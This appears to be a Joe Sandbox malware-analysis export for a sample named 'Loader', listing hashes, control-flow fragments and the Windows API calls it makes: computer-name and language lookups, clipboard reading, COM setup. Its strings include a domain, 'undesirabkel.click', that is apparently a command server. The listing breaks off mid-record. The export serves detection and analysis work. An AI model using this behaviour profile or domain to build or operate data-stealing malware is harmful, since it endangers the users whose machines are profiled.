                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf30f5bda6a5b1f22e383a34f2d374bcf5c2a5ffd3afd8456c42b1e5df0951ff
                                                                                                  • Instruction ID: 72290171dc64d7e4f27391859bf3f99b55d54925dc59b80e2ac98bdd845427b2
                                                                                                  • Opcode Fuzzy Hash: bf30f5bda6a5b1f22e383a34f2d374bcf5c2a5ffd3afd8456c42b1e5df0951ff
                                                                                                  • Instruction Fuzzy Hash: D472E575A04B408FD714DF38C5853AABBE2AF99314F088A3ED5EB87791D678E445CB02
                                                                                                  APIs
                                                                                                  • LdrInitializeThunk.NTDLL(00441BF8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043EBCE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: @
                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                  • Opcode ID: d029721911ace6ae7146d635cd2610f792fc7e2dd43cd493b89f1baae024793e
                                                                                                  • Instruction ID: ac99ad69f4e146c84b4f67b549d234f9fa435a805a225365c348144745e62db1
                                                                                                  • Opcode Fuzzy Hash: d029721911ace6ae7146d635cd2610f792fc7e2dd43cd493b89f1baae024793e
                                                                                                  • Instruction Fuzzy Hash: 9C51BEB4D112159BEB14CF54C8907BFB7B2FFA9315F04612DD4416B3A0EB785C0A8B98
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: @
                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                  • Opcode ID: 00ccdfaef0cf493359b405ba2665aa19c664aa536cebf78614738aaa438344e7
                                                                                                  • Instruction ID: 65ca1ec6d4672f8839795e63c8614bf8e8fa17c57707b6a32643269015e7e6e9
                                                                                                  • Opcode Fuzzy Hash: 00ccdfaef0cf493359b405ba2665aa19c664aa536cebf78614738aaa438344e7
                                                                                                  • Instruction Fuzzy Hash: 9A4158B49083109BEB10CF24D88072BB7E1FF99368F24852DEA88573A1E7389D44C7C6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: @
                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                  • Opcode ID: b277768eaef66f0637a864381fd791a7c7a7d3d97be0c2acc1eb4938501a7204
                                                                                                  • Instruction ID: 9fac65509ee92f571f5b79e95c1ad94962471f478490a82abc777c74c6c74bd9
                                                                                                  • Opcode Fuzzy Hash: b277768eaef66f0637a864381fd791a7c7a7d3d97be0c2acc1eb4938501a7204
                                                                                                  • Instruction Fuzzy Hash: 9A31EEB18083049BD314DF98D8C066BBBF5EB99314F14892DE79987280E335A818CB9A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 9b8b0fe984b0c526368686a946928a16b95041f210f520b4daf9bb1128f79edd
                                                                                                  • Instruction ID: c62094c7f2aec0b4591fe89b4ffec96fa28a786c068cd393fffb3f8dac1334b7
                                                                                                  • Opcode Fuzzy Hash: 9b8b0fe984b0c526368686a946928a16b95041f210f520b4daf9bb1128f79edd
                                                                                                  • Instruction Fuzzy Hash: 0D7127756082419BEB24DF28C890A3FB3E2EFD9750F19C42EE68587365E73498609786
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 76f77a49fba37e77a617a0d652d585f641a783687e7745c1783b0e6500cdef52
                                                                                                  • Instruction ID: 6b3e4b7f11ac291a21e261308eef6cd7443abca3de393b842f6f559da3e6bac2
                                                                                                  • Opcode Fuzzy Hash: 76f77a49fba37e77a617a0d652d585f641a783687e7745c1783b0e6500cdef52
                                                                                                  • Instruction Fuzzy Hash: 8051CE263492116BD7018B25CC81A7BB7EAE7DE360F14952EE5C083342C2BCDC82D79E

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 598 42c3ae-42c3b8 599 42c3ba-42c3c1 598->599 600 42c3db-42c42b FreeLibrary call 440690 598->600 601 42c3d0-42c3d9 599->601 606 42c430-42c45c 600->606 601->600 601->601 606->606 607 42c45e-42c468 606->607 608 42c46a-42c478 607->608 609 42c48d 607->609 610 42c480-42c489 608->610 611 42c494-42c4cc GetComputerNameExA 609->611 610->610 612 42c48b 610->612 613 42c4cf 611->613 612->611 613->613
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042C3E5
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,-!B,00000100), ref: 0042C4AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                  • String ID: -!B$tidc
                                                                                                  • API String ID: 2904949787-476040656
                                                                                                  • Opcode ID: 57dd9652ca8a2e1dfdf703eb478245f04d1e764e2e6b3a4a6fe835d72092e874
                                                                                                  • Instruction ID: 0cb94904c914ad7ae8bd8e1ac9fe588995fa1e3a88885b05c0f925f6698cc2a9
                                                                                                  • Opcode Fuzzy Hash: 57dd9652ca8a2e1dfdf703eb478245f04d1e764e2e6b3a4a6fe835d72092e874
                                                                                                  • Instruction Fuzzy Hash: E321F17420C3918AD7218F39D8507EBBBE6ABE6304F94885ED0C8C7292DA798506C716

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 614 42c3ac-42c42b FreeLibrary call 440690 619 42c430-42c45c 614->619 619->619 620 42c45e-42c468 619->620 621 42c46a-42c478 620->621 622 42c48d 620->622 623 42c480-42c489 621->623 624 42c494-42c4cc GetComputerNameExA 622->624 623->623 625 42c48b 623->625 626 42c4cf 624->626 625->624 626->626
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042C3E5
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,-!B,00000100), ref: 0042C4AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                  • String ID: -!B$tidc
                                                                                                  • API String ID: 2904949787-476040656
                                                                                                  • Opcode ID: 162db42e1e998b1f12c2b9f51427277601aaff401d5d9aca3582506ac13c7d85
                                                                                                  • Instruction ID: 36f598f07a78be95229329e16d831615469c789e38aad443987067daf5129e6e
                                                                                                  • Opcode Fuzzy Hash: 162db42e1e998b1f12c2b9f51427277601aaff401d5d9aca3582506ac13c7d85
                                                                                                  • Instruction Fuzzy Hash: 331136756083908BD720CF35E8407ABBBE6ABD6304F84846ED0C8C7261DF398405C706

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 671 40c5b6-40c718 CoInitializeEx * 2
                                                                                                  APIs
                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C5BA
                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C6FF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize
                                                                                                  • String ID: E)ov
                                                                                                  • API String ID: 2538663250-3776031005
                                                                                                  • Opcode ID: e7a95b8e5ff17603cc907fcbc2df53191815e2a062ed42e83665db1e0f35c6a2
                                                                                                  • Instruction ID: 7eb1427ce90a185cc1fa67b5dec7511066f0963e0e52bfde8587bb9a189e8e04
                                                                                                  • Opcode Fuzzy Hash: e7a95b8e5ff17603cc907fcbc2df53191815e2a062ed42e83665db1e0f35c6a2
                                                                                                  • Instruction Fuzzy Hash: 6941C8B4C10B40AFD370EF39990B7137EB4AB06250F504B1DF9EA866D4E631A4198BD7

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 683 42c332-42c42b call 440690 687 42c430-42c45c 683->687 687->687 688 42c45e-42c468 687->688 689 42c46a-42c478 688->689 690 42c48d 688->690 691 42c480-42c489 689->691 692 42c494-42c4cc GetComputerNameExA 690->692 691->691 693 42c48b 691->693 694 42c4cf 692->694 693->692 694->694
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,-!B,00000100), ref: 0042C4AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID: -!B$tidc
                                                                                                  • API String ID: 3545744682-476040656
                                                                                                  • Opcode ID: 61886e391caa53043cf8b7eeebbfdde2549436c7387b1184654fa6bc82ce0717
                                                                                                  • Instruction ID: cb59f9437d4d6314ce5892b09104ceaf55f68d0d243f063b9a53ef71cd653c73
                                                                                                  • Opcode Fuzzy Hash: 61886e391caa53043cf8b7eeebbfdde2549436c7387b1184654fa6bc82ce0717
                                                                                                  • Instruction Fuzzy Hash: BA11037561C390CBD721CF35D8907EBB7E6ABDA304F94886EC0C8C7255EE7985068716

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 695 42c4da-42c4eb 696 42c50b-42c53b 695->696 697 42c4ed-42c4f4 695->697 700 42c540-42c55a 696->700 698 42c500-42c509 697->698 698->696 698->698 700->700 701 42c55c-42c566 700->701 702 42c57b-42c5b2 GetComputerNameExA 701->702 703 42c568-42c56f 701->703 704 42c570-42c579 703->704 704->702 704->704
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042C594
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID: /CWl$m
                                                                                                  • API String ID: 3545744682-3646203745
                                                                                                  • Opcode ID: 7a167722f522b369fb5a67656a2b11fc2d91befdf65f4b5365c50abbd1630efa
                                                                                                  • Instruction ID: 03530a0ce53fbf409c5d07d4627929f5f9734d687145533c51ec677908ed519b
                                                                                                  • Opcode Fuzzy Hash: 7a167722f522b369fb5a67656a2b11fc2d91befdf65f4b5365c50abbd1630efa
                                                                                                  • Instruction Fuzzy Hash: 19119D3010C7E19ADB319B3894687FBBBE4AF97300F5809ADC0CDC7292D77894458B96

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 705 42c4d1-42c53b 707 42c540-42c55a 705->707 707->707 708 42c55c-42c566 707->708 709 42c57b-42c5b2 GetComputerNameExA 708->709 710 42c568-42c56f 708->710 711 42c570-42c579 710->711 711->709 711->711
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042C594
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID: /CWl$m
                                                                                                  • API String ID: 3545744682-3646203745
                                                                                                  • Opcode ID: 949d0f20e82d11914490ce482742be9fe114ad8304adfa35962e6676036ca1e9
                                                                                                  • Instruction ID: e0895b3182d1dc6c25a11d8008f41e73b737397a8b3a12be8f13edf20661ff36
                                                                                                  • Opcode Fuzzy Hash: 949d0f20e82d11914490ce482742be9fe114ad8304adfa35962e6676036ca1e9
                                                                                                  • Instruction Fuzzy Hash: 1201807010C7E18BDB319B34A8687FBB7E4AB96310F28096DC0CDC7291D77494459B56
                                                                                                  APIs
                                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 0043744B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DefaultLanguageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 95929093-0
                                                                                                  • Opcode ID: 7c68332186bb1eccb24706d0910e4fa35c8b03fbb3c5cb4de671a5428ebb180b
                                                                                                  • Instruction ID: 927bd0fc9cd42a9714e357c3c949b392570058f034d69ee935772a38c2154aa8
                                                                                                  • Opcode Fuzzy Hash: 7c68332186bb1eccb24706d0910e4fa35c8b03fbb3c5cb4de671a5428ebb180b
                                                                                                  • Instruction Fuzzy Hash: 6B113A75A087A24FC7018F3C8D84259BF616B4A610F18C3ECD594573D6CB38A816C7D1
                                                                                                  APIs
                                                                                                  • GetForegroundWindow.USER32 ref: 0043ED37
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ForegroundWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2020703349-0
                                                                                                  • Opcode ID: a5036223926f76e7a30bb82d8b41372fba638fb8ce1a419d4bb5bda1a50e89be
                                                                                                  • Instruction ID: c78e23977c3e2a35fed25d62a8fd294347c45f883251edd20cfe32e08262873d
                                                                                                  • Opcode Fuzzy Hash: a5036223926f76e7a30bb82d8b41372fba638fb8ce1a419d4bb5bda1a50e89be
                                                                                                  • Instruction Fuzzy Hash: AFF0E2B09445D48BDB00CF7AAC593AA37A0EB56305F241975E112D72A1EB3898528B0D
                                                                                                  APIs
                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B2E9,?,00000001), ref: 0043EB72
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: cfbf4a6718c87aec0984e55126ec68d7d5da04f3355e97993dcb15881ca12bd3
                                                                                                  • Instruction ID: f8d085a32fc5b2999584d7c69e937369889b9cf04708eea92d38761de7c40dc4
                                                                                                  • Opcode Fuzzy Hash: cfbf4a6718c87aec0984e55126ec68d7d5da04f3355e97993dcb15881ca12bd3
                                                                                                  • Instruction Fuzzy Hash: FDE02B72905210EBD301AF357C06F177A64AFCA715F050C36F505E2152D638F81196AF
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BlanketProxy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3890896728-0
                                                                                                  • Opcode ID: 0601404d5c011c4097f442398f72a59a3fcd5b637d74b6bd99cb2993c6c4fcc6
                                                                                                  • Instruction ID: f5617d7eab011253af39c7223b5d4b47f89a1495823ff6e5c490b642b0bf52d7
                                                                                                  • Opcode Fuzzy Hash: 0601404d5c011c4097f442398f72a59a3fcd5b637d74b6bd99cb2993c6c4fcc6
                                                                                                  • Instruction Fuzzy Hash: 94F067B4508701CFD714DF29D5A871BBBF0FB84304F11891DE4999B290C7B9A958CF82
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BlanketProxy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3890896728-0
                                                                                                  • Opcode ID: 0b4ce9226a80c191448de904934235e090dea553ac8c548883bf7eee67a76e56
                                                                                                  • Instruction ID: edea177d1479d643d5abc38f34b971a966137ca73a35f0b7da0467f95eeb9627
                                                                                                  • Opcode Fuzzy Hash: 0b4ce9226a80c191448de904934235e090dea553ac8c548883bf7eee67a76e56
                                                                                                  • Instruction Fuzzy Hash: 61F098B450A7018FE354DF28D4A8B1BBBF0FB85314F10891CE5A98B390CBB59948CF86
                                                                                                  APIs
                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C74D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeSecurity
                                                                                                  • String ID:
                                                                                                  • API String ID: 640775948-0
                                                                                                  • Opcode ID: 4a533f3d69b86a9f98a1958157cd7cacc4402abbb5c7b231e86568349e28ee20
                                                                                                  • Instruction ID: d2d1222bed764c505e01a7a437c987e67b96d2d96dffea12848baf7fbc3a0441
                                                                                                  • Opcode Fuzzy Hash: 4a533f3d69b86a9f98a1958157cd7cacc4402abbb5c7b231e86568349e28ee20
                                                                                                  • Instruction Fuzzy Hash: 20E0ECB57A430067FAAC6B14DD22F2521555783B20F35422CA612BD6E4C9942502461C
                                                                                                  APIs
                                                                                                  • GetForegroundWindow.USER32 ref: 0043ED37
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ForegroundWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2020703349-0
                                                                                                  • Opcode ID: a9ffe737249dc3e0122e0f7b10e8a54413ea6789124a50639fd91797d931d788
                                                                                                  • Instruction ID: e9d83bbf03ffa0495804572a0f9332504b97f5da304552063f637eff08c1ad84
                                                                                                  • Opcode Fuzzy Hash: a9ffe737249dc3e0122e0f7b10e8a54413ea6789124a50639fd91797d931d788
                                                                                                  • Instruction Fuzzy Hash: 06E012F9D401548FCB04DF64FC955243374FB562057144439E112C3271D735E522CB59
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(?,00000000), ref: 0043CB0B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: 5a61d3da357a9b9377e023cb1afacc8d5594f4b24d9fa0354fd77178c021c893
                                                                                                  • Instruction ID: 1226c4ec29f38b57e24691680627c35296be4bb29b2a26d95288c068be923f2f
                                                                                                  • Opcode Fuzzy Hash: 5a61d3da357a9b9377e023cb1afacc8d5594f4b24d9fa0354fd77178c021c893
                                                                                                  • Instruction Fuzzy Hash: BAC08C70141122EBD3102F15BC0BB963A10AF01312F0208B2B0006D0B2CA78ECB0C6C8
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,B19801D9,004086F7,B4B7D921), ref: 0043CAD0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: fc5eda2e49f68f0e30b130f1320f09b628e5b9bd0ed49f4e6fdc7f947bd58373
                                                                                                  • Instruction ID: 562293d3e3569241bb9a478438e2c4c3206b523b80c2934943ed8cc9fbbd0605
                                                                                                  • Opcode Fuzzy Hash: fc5eda2e49f68f0e30b130f1320f09b628e5b9bd0ed49f4e6fdc7f947bd58373
                                                                                                  • Instruction Fuzzy Hash: 76C04C71445121AAD6102B15EC09B867F54AF45751F014095B104660B286B0EC928AD8
                                                                                                  APIs
                                                                                                    • Part of subcall function 0043EBA0: LdrInitializeThunk.NTDLL(00441BF8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043EBCE
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0041A269
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0041A2DE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                                  • String ID: 2E'G$54+*$54+*$54+*$8I#K$8U:W$XY$~Q6S
                                                                                                  • API String ID: 764372645-2390782495
                                                                                                  • Opcode ID: 0f80e1662aea17d897eb7f5cc82f5f76a7864b0803524b2c06bda07c8fcedbb3
                                                                                                  • Instruction ID: 2c3f929d4cabc55a225c70deac7f21d0ad3b9eba4449c3fe9de0e78d4448d8f9
                                                                                                  • Opcode Fuzzy Hash: 0f80e1662aea17d897eb7f5cc82f5f76a7864b0803524b2c06bda07c8fcedbb3
                                                                                                  • Instruction Fuzzy Hash: 3982067460A3409FD714CB24D990BABBBE2EBC6314F18882DE58587352D779DC92CB4B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "=B$%! 0$%: !$4$H$de$undesirabkel.click$x}}s
                                                                                                  • API String ID: 0-1692695705
                                                                                                  • Opcode ID: 19c0ccc2f21457345f6c989c8bd1b427ac2a30c96d4d5a23cba524a46654f40a
                                                                                                  • Instruction ID: 2d009fd93e7b9374216b3497db79d8202485ae03d753f23917b742f1bf9f436d
                                                                                                  • Opcode Fuzzy Hash: 19c0ccc2f21457345f6c989c8bd1b427ac2a30c96d4d5a23cba524a46654f40a
                                                                                                  • Instruction Fuzzy Hash: 41821F75708311CFD324CF28E89176BB7E2EB8A311F59897CE59187391D738A906CB86
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 54+*$A$S<.+$\xy>
                                                                                                  • API String ID: 0-3685461857
                                                                                                  • Opcode ID: 38d5dddfc1d7d73f8303f266aa0984ee0180c9c2ce3074419444b47f20e9dfdf
                                                                                                  • Instruction ID: b9dae982806908fc93e9902a33def771db61ac40b6c91c0664327fad2570cd92
                                                                                                  • Opcode Fuzzy Hash: 38d5dddfc1d7d73f8303f266aa0984ee0180c9c2ce3074419444b47f20e9dfdf
                                                                                                  • Instruction Fuzzy Hash: 115212726183418BC725CF28C8A17ABB7E2FFD6314F18496EE4C58B391DB399846C746
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Clipboard$CloseDataOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2058664381-0
                                                                                                  • Opcode ID: 9ace8d3d66c656d27122584beaa275d741043033d7610bd44cbfd8939ce7624b
                                                                                                  • Instruction ID: 5078fe84b0e2f8b0d482d572d4820ca8f51d2eda85a3955b293059345ad65239
                                                                                                  • Opcode Fuzzy Hash: 9ace8d3d66c656d27122584beaa275d741043033d7610bd44cbfd8939ce7624b
                                                                                                  • Instruction Fuzzy Hash: 9B41D4F480C7819FD700AF78D14A36ABFE0AB16345F04853ED48587641D37DA659C797
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00428850
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 004288B5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: A%g'$_\efg$efg
                                                                                                  • API String ID: 237503144-2372333709
                                                                                                  • Opcode ID: a7a1f39499a5e99c848ff68f033dae6045633c5ac20e702f25ecc2a0062ac25d
